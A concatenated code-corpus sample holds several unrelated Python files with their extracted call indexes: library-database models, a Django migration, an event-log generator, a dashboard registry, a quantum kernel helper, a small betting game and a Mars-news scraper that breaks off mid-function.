] | [((1824, 1877), 'requests.post', 'requests.post', (["('http://' + hostname + '/pgmmega/sync')"], {}), "('http://' + hostname + '/pgmmega/sync')\n", (1837, 1877), False, 'import requests\n'), ((2600, 2688), 'requests.post', 'requests.post', (["('http://' + hostname + '/pgmmega/upload')"], {'data': 'hex_file', 'timeout': '(20.0)'}), "('http://' + hostname + '/pgmmega/upload', data=hex_file,\n timeout=20.0)\n", (2613, 2688), False, 'import requests\n'), ((2940, 2955), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (2950, 2955), False, 'import time\n'), ((2960, 3014), 'requests.post', 'requests.post', (["('http://' + hostname + '/console/reset')"], {}), "('http://' + hostname + '/console/reset')\n", (2973, 3014), False, 'import requests\n'), ((3020, 3031), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (3028, 3031), False, 'import sys\n'), ((1796, 1807), 'sys.exit', 'sys.exit', (['(4)'], {}), '(4)\n', (1804, 1807), False, 'import sys\n'), ((2086, 2097), 'sys.exit', 'sys.exit', (['(5)'], {}), '(5)\n', (2094, 2097), False, 'import sys\n'), ((2134, 2186), 'requests.get', 'requests.get', (["('http://' + hostname + '/pgmmega/sync')"], {}), "('http://' + hostname + '/pgmmega/sync')\n", (2146, 2186), False, 'import requests\n'), ((2448, 2463), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (2458, 2463), False, 'import time\n'), ((2826, 2837), 'sys.exit', 'sys.exit', (['(8)'], {}), '(8)\n', (2834, 2837), False, 'import sys\n'), ((3397, 3436), 'subprocess.call', 'subprocess.call', (['command'], {'stdout': 'output'}), '(command, stdout=output)\n', (3412, 3436), False, 'import subprocess\n'), ((998, 1009), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1006, 1009), False, 'import sys\n'), ((2427, 2438), 'sys.exit', 'sys.exit', (['(7)'], {}), '(7)\n', (2435, 2438), False, 'import sys\n'), ((1100, 1136), 're.search', 're.search', (['ip_regex', 'argv[index + 1]'], {}), '(ip_regex, argv[index + 1])\n', (1109, 1136), False, 'import re\n'), ((1414, 1425), 
'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1422, 1425), False, 'import sys\n'), ((3260, 3277), 'platform.system', 'platform.system', ([], {}), '()\n', (3275, 3277), False, 'import platform\n'), ((1290, 1301), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (1298, 1301), False, 'import sys\n'), ((1512, 1543), 'os.path.isfile', 'os.path.isfile', (['argv[index + 1]'], {}), '(argv[index + 1])\n', (1526, 1543), False, 'import os\n'), ((1694, 1705), 'sys.exit', 'sys.exit', (['(3)'], {}), '(3)\n', (1702, 1705), False, 'import sys\n')] |
from datetime import datetime
from book_manage import db, login_manager
from flask_login import UserMixin
@login_manager.user_loader
def load_user(user_id):
    """Flask-Login hook: resolve a session's stored id to an Admin row."""
    admin_pk = int(user_id)
    return Admin.query.get(admin_pk)
# This class to hold Admins who uploads books.
class Admin(db.Model, UserMixin):
    """Admin account: can log in (Flask-Login's UserMixin) and owns uploads."""
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(100), nullable=False)
    email = db.Column(db.String(100), nullable=False)
    # NOTE(review): stored as-is here; presumably hashed before insert — confirm at call sites.
    password = db.Column(db.String(100), nullable=False)
    # One-to-many relationship with Uploaded; 'auth' is the backref on Uploaded.
    posts = db.relationship('Uploaded', backref='auth', lazy=True)
    def __repr__(self):
        return f"Admin('{self.username}', '{self.email}')"
# This is a table where books gonna be saved.
class Uploaded(db.Model):
    """A book record uploaded by an Admin."""
    id = db.Column(db.Integer, primary_key=True)
    title = db.Column(db.String(100), nullable=False)
    author = db.Column(db.String(10))
    description = db.Column(db.Text)
    # db.ForeignKey('admin.id') links each upload back to the Admin who owns it.
    user_id = db.Column(db.Integer, db.ForeignKey('admin.id'), nullable=False)
    def __repr__(self):
        return f"Uploaded('{self.title}', '{self.author}', '{self.description}')"
# This is a table where all the borrowed books info
# gonna be saved.
class Borrowed(db.Model):
    """A currently-borrowed book together with who borrowed it and when."""
    id = db.Column(db.Integer, primary_key=True)
    customer = db.Column(db.String(16), nullable=False)
    title = db.Column(db.String(100), nullable=False)
    author = db.Column(db.String(10))
    # Defaults to the (naive UTC) creation time of the row.
    borrow_date = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
    return_date = db.Column(db.DateTime, nullable=False)
    def __repr__(self):
        return f"Borrowed('{self.customer}', '{self.title}', '{self.author}', '{self.borrow_date}', '{self.return_date}')"
# This is a table to save users who borrow the book.
# And information of that book.
class Returned(db.Model):
    """History record of a completed borrow: who had the book and for how long."""
    id = db.Column(db.Integer, primary_key=True)
    customer_name = db.Column(db.String(16), nullable=False)
    customer_id = db.Column(db.Integer, nullable=False)
    book_title = db.Column(db.String(100), nullable=False)
    book_author = db.Column(db.String(100), nullable=False)
    borrowed_date = db.Column(db.DateTime, nullable=False)
    returned_date = db.Column(db.DateTime, nullable=False)
    def __repr__(self):
        return f"Returned('{self.customer_name}', '{self.book_title}', '{self.borrowed_date}', '{self.returned_date}')"
| [
"book_manage.db.ForeignKey",
"book_manage.db.relationship",
"book_manage.db.String",
"book_manage.db.Column"
] | [((293, 332), 'book_manage.db.Column', 'db.Column', (['db.Integer'], {'primary_key': '(True)'}), '(db.Integer, primary_key=True)\n', (302, 332), False, 'from book_manage import db, login_manager\n'), ((565, 619), 'book_manage.db.relationship', 'db.relationship', (['"""Uploaded"""'], {'backref': '"""auth"""', 'lazy': '(True)'}), "('Uploaded', backref='auth', lazy=True)\n", (580, 619), False, 'from book_manage import db, login_manager\n'), ((794, 833), 'book_manage.db.Column', 'db.Column', (['db.Integer'], {'primary_key': '(True)'}), '(db.Integer, primary_key=True)\n', (803, 833), False, 'from book_manage import db, login_manager\n'), ((944, 962), 'book_manage.db.Column', 'db.Column', (['db.Text'], {}), '(db.Text)\n', (953, 962), False, 'from book_manage import db, login_manager\n'), ((1354, 1393), 'book_manage.db.Column', 'db.Column', (['db.Integer'], {'primary_key': '(True)'}), '(db.Integer, primary_key=True)\n', (1363, 1393), False, 'from book_manage import db, login_manager\n'), ((1560, 1623), 'book_manage.db.Column', 'db.Column', (['db.DateTime'], {'nullable': '(False)', 'default': 'datetime.utcnow'}), '(db.DateTime, nullable=False, default=datetime.utcnow)\n', (1569, 1623), False, 'from book_manage import db, login_manager\n'), ((1642, 1680), 'book_manage.db.Column', 'db.Column', (['db.DateTime'], {'nullable': '(False)'}), '(db.DateTime, nullable=False)\n', (1651, 1680), False, 'from book_manage import db, login_manager\n'), ((1951, 1990), 'book_manage.db.Column', 'db.Column', (['db.Integer'], {'primary_key': '(True)'}), '(db.Integer, primary_key=True)\n', (1960, 1990), False, 'from book_manage import db, login_manager\n'), ((2070, 2107), 'book_manage.db.Column', 'db.Column', (['db.Integer'], {'nullable': '(False)'}), '(db.Integer, nullable=False)\n', (2079, 2107), False, 'from book_manage import db, login_manager\n'), ((2247, 2285), 'book_manage.db.Column', 'db.Column', (['db.DateTime'], {'nullable': '(False)'}), '(db.DateTime, nullable=False)\n', (2256, 
2285), False, 'from book_manage import db, login_manager\n'), ((2306, 2344), 'book_manage.db.Column', 'db.Column', (['db.DateTime'], {'nullable': '(False)'}), '(db.DateTime, nullable=False)\n', (2315, 2344), False, 'from book_manage import db, login_manager\n'), ((358, 372), 'book_manage.db.String', 'db.String', (['(100)'], {}), '(100)\n', (367, 372), False, 'from book_manage import db, login_manager\n'), ((412, 426), 'book_manage.db.String', 'db.String', (['(100)'], {}), '(100)\n', (421, 426), False, 'from book_manage import db, login_manager\n'), ((469, 483), 'book_manage.db.String', 'db.String', (['(100)'], {}), '(100)\n', (478, 483), False, 'from book_manage import db, login_manager\n'), ((856, 870), 'book_manage.db.String', 'db.String', (['(100)'], {}), '(100)\n', (865, 870), False, 'from book_manage import db, login_manager\n'), ((911, 924), 'book_manage.db.String', 'db.String', (['(10)'], {}), '(10)\n', (920, 924), False, 'from book_manage import db, login_manager\n'), ((1093, 1118), 'book_manage.db.ForeignKey', 'db.ForeignKey', (['"""admin.id"""'], {}), "('admin.id')\n", (1106, 1118), False, 'from book_manage import db, login_manager\n'), ((1419, 1432), 'book_manage.db.String', 'db.String', (['(16)'], {}), '(16)\n', (1428, 1432), False, 'from book_manage import db, login_manager\n'), ((1472, 1486), 'book_manage.db.String', 'db.String', (['(100)'], {}), '(100)\n', (1481, 1486), False, 'from book_manage import db, login_manager\n'), ((1527, 1540), 'book_manage.db.String', 'db.String', (['(10)'], {}), '(10)\n', (1536, 1540), False, 'from book_manage import db, login_manager\n'), ((2021, 2034), 'book_manage.db.String', 'db.String', (['(16)'], {}), '(16)\n', (2030, 2034), False, 'from book_manage import db, login_manager\n'), ((2135, 2149), 'book_manage.db.String', 'db.String', (['(100)'], {}), '(100)\n', (2144, 2149), False, 'from book_manage import db, login_manager\n'), ((2195, 2209), 'book_manage.db.String', 'db.String', (['(100)'], {}), '(100)\n', (2204, 
2209), False, 'from book_manage import db, login_manager\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2017-08-22 14:31
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: make Session.date_created / date_modified self-managing
    (auto_now_add on insert, auto_now on save) and give both verbose names."""
    dependencies = [
        ('cards', '0003_session_revision'),
    ]

    operations = [
        migrations.AlterField(
            model_name='session',
            name='date_created',
            field=models.DateTimeField(auto_now_add=True, verbose_name='Date created'),
        ),
        migrations.AlterField(
            model_name='session',
            name='date_modified',
            field=models.DateTimeField(auto_now=True, verbose_name='Date modified'),
        ),
    ]
| [
"django.db.models.DateTimeField"
] | [((403, 471), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'verbose_name': '"""Date created"""'}), "(auto_now_add=True, verbose_name='Date created')\n", (423, 471), False, 'from django.db import migrations, models\n'), ((601, 666), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)', 'verbose_name': '"""Date modified"""'}), "(auto_now=True, verbose_name='Date modified')\n", (621, 666), False, 'from django.db import migrations, models\n')] |
from typing import List
import os
"""
Event counter. Is counted up for each new event (row in CSV file) generated.
"""
event_count = 0
"""
Counting commands being issued. Used as second argument
to events (the 'nr'). First generated will be 0.
"""
command_counter: int = 0
"""
The file written to.
"""
file = None
def write(event: str):
    """Append one event row to the open CSV file and bump the event counter.

    Relies on the module-global ``file`` having been opened by ``log()``.

    :param event: the event, already comma-formatted.
    """
    global file
    global event_count
    event_count += 1
    # (removed commented-out debug print)
    file.write(f'{event}\n')
def next_nr() -> str:
    """Return the next command number as a string, advancing the counter.

    :return: the number that was current before the increment.
    """
    global command_counter
    current = command_counter
    command_counter = current + 1
    return str(current)
def blast(commands: int):
    """Issue *commands* commands in parallel, dispatch them all, let them all
    succeed, then close them all.

    :param commands: the number of commands being issued in parallel.
    """
    batch = [(cmd, next_nr()) for cmd in range(commands)]
    # Run each phase across the whole batch before starting the next one.
    for phase in (command, dispatch, succeed, close):
        for cmd, nr in batch:
            phase(cmd, nr)
def log(commands: int, repeat: int):
    """Generate a log of *repeat* sections, each with *commands* commands
    issued, dispatched, succeeding and closing in parallel.

    Writes ``log-<commands>-<repeat>.csv`` in the current directory.

    :param commands: the number of commands being issued in parallel.
    :param repeat: the number of times the parallel command executions should be repeated.
    """
    global command_counter
    global event_count
    global file
    command_counter = 0
    event_count = 0
    file_name = f'log-{commands}-{repeat}.csv'
    # Context manager guarantees the file is closed even if a blast raises
    # (the original only closed on the happy path).
    with open(file_name, "w") as file:
        for _ in range(repeat):
            blast(commands)
    print()
    print(f'{file_name}')
    print(f'{event_count} events generated')
def command(cmd: str, nr: str, kind: str = "FSW"):
    """Generate a command event.

    :param cmd: the command.
    :param nr: the command number.
    :param kind: the command kind.
    """
    row = f'command,{cmd},{nr},{kind}'
    write(row)


def dispatch(cmd: str, nr: str):
    """Generate a dispatch event.

    :param cmd: the command.
    :param nr: the command number.
    """
    row = f'dispatch,{cmd},{nr}'
    write(row)


def succeed(cmd: str, nr: str):
    """Generate a succeed event.

    :param cmd: the command.
    :param nr: the command number.
    """
    row = f'succeed,{cmd},{nr}'
    write(row)


def close(cmd: str, nr: str):
    """Generate a close event.

    :param cmd: the command.
    :param nr: the command number.
    """
    row = f'close,{cmd},{nr}'
    write(row)


def cancel(cmd: str, nr: str):
    """Generate a cancel event.

    :param cmd: the command.
    :param nr: the command number.
    """
    row = f'cancel,{cmd},{nr}'
    write(row)


def fail(cmd: str, nr: str):
    """Generate a fail event.

    :param cmd: the command.
    :param nr: the command number.
    """
    row = f'fail,{cmd},{nr}'
    write(row)
def copy_files():
    """Copy the generated CSV logs into the logscope/daut example folders,
    replacing any logs already there."""
    dev = '/Users/khavelun/Desktop/development'
    targets = [
        f'{dev}/logscope/backend/test/suite8',
        f'{dev}/pycharmworkspace/logscope/examples/example3-sacsvt-2022',
        f'{dev}/ideaworkspace/daut/src/test/scala/daut38_sacsvt_2022',
    ]
    for target in targets:
        os.system(f'rm {target}/log*.csv')
        os.system(f'cp log*.csv {target}')
if __name__ == '__main__':
    # Start from a clean slate: remove logs from previous runs.
    os.system('rm log*.csv')
    # traces of length 100,000 events
    log(1, 12500)
    log(50, 250)
    # traces of length 200,000 events
    log(1, 50000)
    log(5, 10000)
    log(10, 5000)
    log(20, 2500)
    # traces of length 500,000 events
    log(1, 125000)
    log(5, 25000)
    # copy files to logscope-py, logscope-cpp, daut
    copy_files()
| [
"os.system"
] | [((3565, 3589), 'os.system', 'os.system', (['"""rm log*.csv"""'], {}), "('rm log*.csv')\n", (3574, 3589), False, 'import os\n'), ((3464, 3493), 'os.system', 'os.system', (['f"""rm {d}/log*.csv"""'], {}), "(f'rm {d}/log*.csv')\n", (3473, 3493), False, 'import os\n'), ((3502, 3531), 'os.system', 'os.system', (['f"""cp log*.csv {d}"""'], {}), "(f'cp log*.csv {d}')\n", (3511, 3531), False, 'import os\n')] |
#!/usr/bin/python
# ex:set fileencoding=utf-8:
from __future__ import unicode_literals
from django.conf.urls import patterns
# from django.conf.urls import url
from django.contrib.admin.sites import AlreadyRegistered
from django.core.exceptions import ImproperlyConfigured
from django.utils import six
from django.utils.text import slugify
from collections import OrderedDict
from .category import Category
import re
import logging
logger = logging.getLogger(__name__)
class DashboardMetaclass(type):
    """Validates Dashboard subclasses on creation: requires a ``name`` and a
    slug made only of word characters/dashes, and derives a URL-safe ``key``
    from the slug."""

    def __new__(cls, name, bases, attrs):
        super_new = super(DashboardMetaclass, cls).__new__
        parents = [
            b for b in bases if isinstance(b, DashboardMetaclass) and
            not (b.__name__ == 'NewBase' and b.__mro__ == (b, object))
        ]
        if not parents:
            # The Dashboard base class itself: nothing to validate.
            return super_new(cls, name, bases, attrs)

        # Create the class.
        new_cls = super_new(cls, name, bases, attrs)

        # validation
        if not getattr(new_cls, 'name', None):
            raise ImproperlyConfigured('No name attribute defined in %s.' % new_cls)
        if not getattr(new_cls, 'slug', None):
            raise ImproperlyConfigured('No slug attribute defined in %s.' % new_cls)
        if not re.match(r'^[\w-]+$', new_cls.slug):
            raise ImproperlyConfigured('The slug attribute defined in %s contains invalid chars.' % new_cls)

        # we add a key to add a unique identifier
        # the key is equal to the slug (for now) but this
        # gives us the opportunity to add i18n urls later
        key = getattr(new_cls, 'key', new_cls.slug)
        # BUG FIX: the original called re.match(key, r'^[\w-]%') — pattern and
        # string swapped, and the pattern itself malformed. Validate the key
        # the same way the slug is validated above; otherwise slugify it.
        if re.match(r'^[\w-]+$', key):
            new_cls.key = key
        else:
            new_cls.key = slugify(key)
        return new_cls
class Dashboard(six.with_metaclass(DashboardMetaclass, object)):
    """An ordered collection of Category instances plus registries for
    modules and reports, bound to a site object."""

    def __init__(self, site):
        self.data = OrderedDict()  # key -> Category instance, insertion-ordered
        self.site = site
        self.modules = []
        self.reports = []

    def __bool__(self):
        # A dashboard is truthy once it holds at least one category.
        return bool(self.data)

    def __nonzero__(self):
        # Python 2 alias for __bool__.
        return self.__bool__()

    def __len__(self):
        return len(self.data)

    def __eq__(self, other):
        # Dashboards are identified by their unique key.
        if isinstance(other, Dashboard):
            return self.key == other.key
        else:
            return False

    def __iter__(self):
        return self.data.values().__iter__()

    def __getitem__(self, key):
        return self.data[key]

    def __contains__(self, item):
        # Accept either a Category instance or a bare key string.
        if isinstance(item, Category):
            key = item.key
        else:
            key = item
        return key in self.data

    def get_urls(self):
        # No dashboard-level views are exposed yet; return an empty pattern
        # set. (Removed a large block of commented-out per-view URL wiring.)
        urlpatterns = patterns('')
        return urlpatterns

    def add_report(self, report_class):
        """
        Adds a report to the dashboard
        """
        for report in self.reports:
            # BUG FIX: the original called isinstance(report_class, report),
            # i.e. with an *instance* as the second argument, which raises
            # TypeError. Mirror add_category: check whether an instance of
            # this class is already registered.
            if isinstance(report, report_class):
                raise AlreadyRegistered('The report %s is already registered' % report_class.__name__)
        report = report_class()
        self.reports.append(report)
        logger.debug('Registered Report "%s"', report.key)
        return report

    def get_module(self, model):
        return self.site.modules[model]

    def add_module(self, module):
        """
        Adds a module to the dashboard
        """
        if module.model in self.site.modules:
            raise AlreadyRegistered('The module %s is already registered' % module.model.__name__)
        self.site.modules[module.model] = module()
        logger.debug('Registered Module "%s"', module.__name__)
        return self.site.modules[module.model]

    def add_category(self, category):
        """
        Adds a category to the dashboard
        """
        for cat in self.data.values():
            if isinstance(cat, category):
                return cat
        cat = category()
        self.data[cat.key] = cat
        logger.debug('Registered Category "%s"', cat.__class__.__name__)
        return cat
| [
"logging.getLogger",
"django.utils.text.slugify",
"collections.OrderedDict",
"django.utils.six.with_metaclass",
"re.match",
"django.contrib.admin.sites.AlreadyRegistered",
"django.conf.urls.patterns",
"django.core.exceptions.ImproperlyConfigured"
] | [((447, 474), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (464, 474), False, 'import logging\n'), ((1771, 1817), 'django.utils.six.with_metaclass', 'six.with_metaclass', (['DashboardMetaclass', 'object'], {}), '(DashboardMetaclass, object)\n', (1789, 1817), False, 'from django.utils import six\n'), ((1619, 1644), 're.match', 're.match', (['key', '"""^[\\\\w-]%"""'], {}), "(key, '^[\\\\w-]%')\n", (1627, 1644), False, 'import re\n'), ((1871, 1884), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1882, 1884), False, 'from collections import OrderedDict\n'), ((2632, 2644), 'django.conf.urls.patterns', 'patterns', (['""""""'], {}), "('')\n", (2640, 2644), False, 'from django.conf.urls import patterns\n'), ((1028, 1094), 'django.core.exceptions.ImproperlyConfigured', 'ImproperlyConfigured', (["('No name attribute defined in %s.' % new_cls)"], {}), "('No name attribute defined in %s.' % new_cls)\n", (1048, 1094), False, 'from django.core.exceptions import ImproperlyConfigured\n'), ((1161, 1227), 'django.core.exceptions.ImproperlyConfigured', 'ImproperlyConfigured', (["('No slug attribute defined in %s.' % new_cls)"], {}), "('No slug attribute defined in %s.' % new_cls)\n", (1181, 1227), False, 'from django.core.exceptions import ImproperlyConfigured\n'), ((1244, 1279), 're.match', 're.match', (['"""^[\\\\w-]+$"""', 'new_cls.slug'], {}), "('^[\\\\w-]+$', new_cls.slug)\n", (1252, 1279), False, 'import re\n'), ((1298, 1393), 'django.core.exceptions.ImproperlyConfigured', 'ImproperlyConfigured', (["('The slug attribute defined in %s contains invalid chars.' % new_cls)"], {}), "(\n 'The slug attribute defined in %s contains invalid chars.' 
% new_cls)\n", (1318, 1393), False, 'from django.core.exceptions import ImproperlyConfigured\n'), ((1716, 1728), 'django.utils.text.slugify', 'slugify', (['key'], {}), '(key)\n', (1723, 1728), False, 'from django.utils.text import slugify\n'), ((4197, 4282), 'django.contrib.admin.sites.AlreadyRegistered', 'AlreadyRegistered', (["('The module %s is already registered' % module.model.__name__)"], {}), "('The module %s is already registered' % module.model.__name__\n )\n", (4214, 4282), False, 'from django.contrib.admin.sites import AlreadyRegistered\n'), ((3730, 3815), 'django.contrib.admin.sites.AlreadyRegistered', 'AlreadyRegistered', (["('The report %s is already registered' % report_class.__name__)"], {}), "('The report %s is already registered' % report_class.__name__\n )\n", (3747, 3815), False, 'from django.contrib.admin.sites import AlreadyRegistered\n')] |
# -*- coding: utf-8 -*-
# Copyright 2018, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
import os
from qiskit import *
import numpy as np
import time
import itertools
import math
from random import *
def inner_prod_circuit_ML(entangler_map, coupling_map, initial_layout,n, x_vec1, x_vec2, name = 'circuit',\
                          meas_string = None, measurement = True):
    """Build a circuit whose all-zero measurement probability estimates the
    squared overlap of the feature-map states of x_vec1 and x_vec2.

    The entangled feature map U(x_vec1) is applied twice, then the inverse
    map for x_vec2 is applied twice (gates in reverse order, negated angles).

    :param entangler_map: dict node -> list of target qubits to entangle with.
    :param n: number of qubits in the registers.
    :param x_vec1: first data vector (rotation angles), one entry per qubit used.
    :param x_vec2: second data vector (rotation angles).
    :param name: circuit name, returned unchanged alongside the circuit.
    :return: (name, QuantumCircuit) pair.

    NOTE(review): coupling_map, initial_layout, meas_string and measurement
    are accepted but never used; measurement is always appended — confirm
    whether the flags were meant to be honored.
    """
    # setup the circuit
    q = QuantumRegister("q", n)
    c = ClassicalRegister("c", n)
    trial_circuit = QuantumCircuit(q, c)
    # 0: Set the qubits in superposition
    #write input state from sample distribution
    for r in range(len(x_vec1)):
        trial_circuit.h(q[r])
        trial_circuit.u1(2*x_vec1[r], q[r])
    # 1: Using entanglement,map the training data to a quantum feature map
    for node in entangler_map:
        for j in entangler_map[node]:
            trial_circuit.cx(q[node], q[j])
            trial_circuit.u1(2*(np.pi-x_vec1[node])*(np.pi-x_vec1[j]), q[j])
            trial_circuit.cx(q[node], q[j])
    # 2: inference the quantum classifier.
    # Second application of the x_vec1 feature map.
    for r in range(len(x_vec1)):
        trial_circuit.h(q[r])
        trial_circuit.u1(2*x_vec1[r], q[r])
    for node in entangler_map:
        for j in entangler_map[node]:
            trial_circuit.cx(q[node], q[j])
            trial_circuit.u1(2*(np.pi-x_vec1[node])*(np.pi-x_vec1[j]), q[j])
    # From here on: the inverse feature map for x_vec2 (negated angles,
    # gates in reverse order), uncomputing back toward |0...0>.
    for node in entangler_map:
        for j in entangler_map[node]:
            trial_circuit.u1(-2*(np.pi-x_vec2[node])*(np.pi-x_vec2[j]), q[j])
            trial_circuit.cx(q[node], q[j])
    for r in range(len(x_vec2)):
        trial_circuit.u1(-2*x_vec2[r], q[r])
        trial_circuit.h(q[r])
    for node in entangler_map:
        for j in entangler_map[node]:
            trial_circuit.cx(q[node], q[j])
            trial_circuit.u1(-2*(np.pi-x_vec2[node])*(np.pi-x_vec2[j]), q[j])
            trial_circuit.cx(q[node], q[j])
    for r in range(len(x_vec2)):
        trial_circuit.u1(-2*x_vec2[r], q[r])
        trial_circuit.h(q[r])
    trial_circuit.measure(q,c)
    return name, trial_circuit
# ***************
# ***************
# ***************
def matrify(vector, dimension):
    """Unpack the strict upper triangle stored in *vector* into a symmetric
    dimension x dimension matrix with ones on the diagonal.

    :param vector: flat sequence holding the upper-triangular entries row by
        row; the first dimension*(dimension-1)/2 values are used, extras
        are ignored (matching the original indexing behaviour).
    :param dimension: size of the square output matrix.
    :return: symmetric numpy array with unit diagonal.
    """
    mat = np.eye(dimension, dimension)
    # Idiom: np.triu_indices replaces the original's manual offset arithmetic
    # (a = d*kk - kk*(kk+1)/2, ...) for addressing the strict upper triangle.
    rows, cols = np.triu_indices(dimension, k=1)
    mat[rows, cols] = np.asarray(vector)[:rows.size]
    # Mirror the upper triangle into the lower one; the diagonal stays 1.
    mat[cols, rows] = mat[rows, cols]
    return mat
def eval_svm_function(entangler_map, coupling_map, initial_layout, n, m, svm, test_input, class_labels,
                      backend, shots):
    """Estimate kernel values between every test sample and every support
    vector by running inner-product circuits on *backend*.

    :param entangler_map: entangler map forwarded to inner_prod_circuit_ML.
    :param n: number of qubits / feature dimension.
    :param svm: sequence of support vectors.
    :param test_input: dict mapping class label -> array of test samples.
    :param class_labels: the two class labels whose samples are evaluated.
    :param backend: qiskit backend to execute on.
    :param shots: number of measurement shots per circuit.
    :return: flat list of kernel estimates, ordered test-sample-major.

    NOTE(review): coupling_map, initial_layout and m are kept for interface
    compatibility but are unused (as in the original, which also carried
    several dead locals — removed here).
    """
    # The all-zero bit string: its measurement frequency estimates the
    # squared inner product of the two feature-map states.
    my_zero_string = '0' * n

    first_array = test_input[class_labels[0]]
    second_array = test_input[class_labels[1]]
    total_test = np.concatenate([first_array, second_array])

    # Build one inner-product circuit per (test sample, support vector) pair.
    circuits = []
    ind = 0
    for a in range(len(total_test)):
        for b in range(len(svm)):
            _, circ = inner_prod_circuit_ML(entangler_map, coupling_map, initial_layout, n,
                                             svm[b], total_test[a], 'AB' + str(ind), None, True)
            circuits.append(circ)
            ind += 1

    job_sim = execute(circuits, backend, shots=shots)
    sim_result = job_sim.result()

    # Fraction of all-zero outcomes per circuit. Using .get(..., 0) keeps a
    # circuit that never produced the all-zero string from raising KeyError
    # (the original crashed in that case).
    K_total = []
    for circ in circuits:
        counts = sim_result.get_counts(circ)
        K_total.append(counts.get(my_zero_string, 0) / shots)
    return K_total
| [
"numpy.eye",
"numpy.concatenate"
] | [((2266, 2294), 'numpy.eye', 'np.eye', (['dimension', 'dimension'], {}), '(dimension, dimension)\n', (2272, 2294), True, 'import numpy as np\n'), ((3185, 3228), 'numpy.concatenate', 'np.concatenate', (['[first_array, second_array]'], {}), '([first_array, second_array])\n', (3199, 3228), True, 'import numpy as np\n')] |
import random
# Simple red/black betting loop: the player guesses a colour, the computer
# draws one at random, and the round is won on a match.
keepplaying = True
while keepplaying:
    myInput = input("Bet your color Type: Red or Black:")
    myInput = myInput.lower()
    computerInput = random.randint(1, 2)
    # Map the random draw (1 or 2) onto a colour name.
    computerSelection = "red" if computerInput == 1 else "black"
    if computerSelection == myInput:
        print("You win!")
    else:
        print("You lose")
    user_input = input("Do you want to continue playing?")
    if user_input == "no":
        keepplaying = False
| [
"random.randint"
] | [((165, 185), 'random.randint', 'random.randint', (['(1)', '(2)'], {}), '(1, 2)\n', (179, 185), False, 'import random\n')] |
#########################################################################################
# Convert Jupyter notebook from Step 1 into Python script with a function called scrape
# that will execute all scraping code and return one Python dictionary containing
# all of the scraped data.
#########################################################################################
# Import Dependencies
from flask import Flask, jsonify
from bs4 import BeautifulSoup as bs
import requests
import pandas as pd
def scrape():
    """Scrape several Mars-related sites and return one dict with all results.

    Returns a dict with keys: news_title_list, news_p_list,
    featured_image_url, mars_weather, html_table_str, hemisphere_image_urls.

    NOTE(review): this depends on the live page structure of nasa.gov,
    jpl.nasa.gov, twitter.com, space-facts.com and planetary.org; the CSS
    class selectors below may rot as those sites change.
    """
    ###################################################################################################################
    # 1. Scrape the NASA Mars News Site and collect the latest News Title and Paragraph Text.
    # 2. Find the image url for the current Featured Mars Image and assign the url to a variable, featured_image_url.
    # 3. Visit the Mars Weather twitter page and scrape the latest Mars weather tweet from the page into mars_weather.
    # 4. Visit the Mars Facts webpage and use Pandas to scrape the facts table and convert into an html_table_str.
    # 5. Visit planetary.org to obtain high resolution images for each of Mar's hemispheres and make a dictionary.
    ###################################################################################################################

    # 1. Scrape HTML from NASA website
    url = 'https://mars.nasa.gov/news/?page=0&per_page=40&order=publish_date+desc%2Ccreated_at+desc&search=&category=19%2C165%2C184%2C204&blank_scope=Latest'
    response = requests.get(url)
    parsed = bs(response.text, 'html.parser')

    ## Find and save titles and description into lists
    news_title_list = []
    news_p_list = []
    for div in parsed.find_all('div', class_ = 'slide'):
        news_title = div.find('div', class_ = 'content_title').text.strip()
        news_p = div.find('div', class_ = 'rollover_description_inner').text.strip()
        news_title_list.append(news_title)
        news_p_list.append(news_p)

    # 2. Scrape HTML from JPL Mars Space Images
    jplmars_url = 'https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'
    response = requests.get(jplmars_url)
    parsed_jplmars = bs(response.text, 'html.parser')

    ## Find and save featured image url
    ### (Splinter's Selenium's Geckodriver was denied on MacOS due to my security settings so I won't be using Splinter)
    # NOTE(review): keeps the *last* matching anchor; if no anchor matches,
    # featured_image_url is never bound and the dict build below raises
    # NameError — confirm the page always carries at least one match.
    for a in parsed_jplmars.find_all('a', class_ = 'button fancybox'):
        featured_image_url = 'https://www.jpl.nasa.gov' + a.get('data-fancybox-href')

    # 3. Scrape HTML from Mars Weather's Twitter Page
    twitter_url = 'https://twitter.com/marswxreport?lang=en'
    response = requests.get(twitter_url)
    parsed_twitter = bs(response.text, 'html.parser')

    ## Scrape the latest Mars weather tweet from the page
    # NOTE(review): iterating a BeautifulSoup Tag yields its children, so
    # mars_weather ends up as the *last* child of the tweet <p> — confirm
    # this is the intended text node.
    for p in parsed_twitter.find('p', class_ ="TweetTextSize TweetTextSize--normal js-tweet-text tweet-text"):
        mars_weather = p

    # 4. Scrape table from Mars Facts using Pandas
    spacefacts_url = 'https://space-facts.com/mars/'
    tables = pd.read_html(spacefacts_url)
    df = tables[0]

    ## Use Pandas to convert the data to a HTML table string
    html_table_str = df.to_html()

    # 5. Scrape HTML from planetary.org
    hemispheres_url = 'http://www.planetary.org/blogs/guest-blogs/bill-dunford/20140203-the-faces-of-mars.html'
    response = requests.get(hemispheres_url)
    parsed_hemisphere = bs(response.text, 'html.parser')

    hemisphere_image_urls = []

    # Get img urls and save into a dictionary then append to a list.
    for img in parsed_hemisphere.find_all('img', class_ = 'img840'):
        hemisphere_title = img.get('alt')
        hemisphere_url = img.get('src')
        new_dict = {
            'title': hemisphere_title,
            'img_url': hemisphere_url
        }
        hemisphere_image_urls.append(new_dict)

